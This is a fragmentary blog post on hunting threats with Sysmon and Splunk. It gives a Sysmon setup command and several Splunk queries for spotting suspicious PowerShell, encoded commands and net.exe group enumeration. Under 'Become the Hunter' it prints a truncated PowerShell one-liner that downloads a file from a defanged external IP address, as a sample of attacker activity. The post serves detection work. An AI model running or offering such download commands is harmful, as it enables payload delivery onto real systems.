Splunking the Endpoint: Threat Hunting with Sysmon

Michael Haag
Feb 6, 2017 · 5 min read

Sysmon

https://blogs.technet.microsoft.com/motiba/2016/10/18/sysinternals-sysmon-unleashed/

Setup

Sysmon

sysmon.exe -c sysmonconfig-export.xml

Splunk


Splunk

 sourcetype=”XmlWinEventLog:Microsoft-Windows-Sysmon/Operational”
http://localhost:8000/en-US/manager/app_splunk_sysmon_hunter/admin/macros

Become the Hunter

powershell -command “& { (New-Object Net.WebClient).DownloadFile(‘http://188[.]164[.]249[.]125/9230dd6471474e2417c19ef02698747e'

Hunting in Splunk

EventDescription

`sysmon` | top EventDescription
`sysmon` process=*\powershell.exe | stats values(EventDescription) by process
`sysmon` | stats values(EventDescription) by process,CommandLine
`sysmon` | stats values(ParentImage) by process

CommandLine

`sysmon` | stats values(CommandLine) by Computer,process

Processes

`sysmon` process=*\\powershell.exe | stats values(CommandLine) by Computer,process
`sysmon` process=*\\powershell.exe CommandLine=”*-enc*” | top CommandLine
`sysmon` process=*\\net.exe | stats count by Computer,CommandLine
`sysmon` process=”*\\net.exe” (CommandLine=”*net group*” OR CommandLine=”*net localgroup*”) | stats count by Computer,CommandLine

Users

`sysmon` | stats values(user) by Computer
`sysmon` | stats values(CommandLine) by user

Things to do…

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade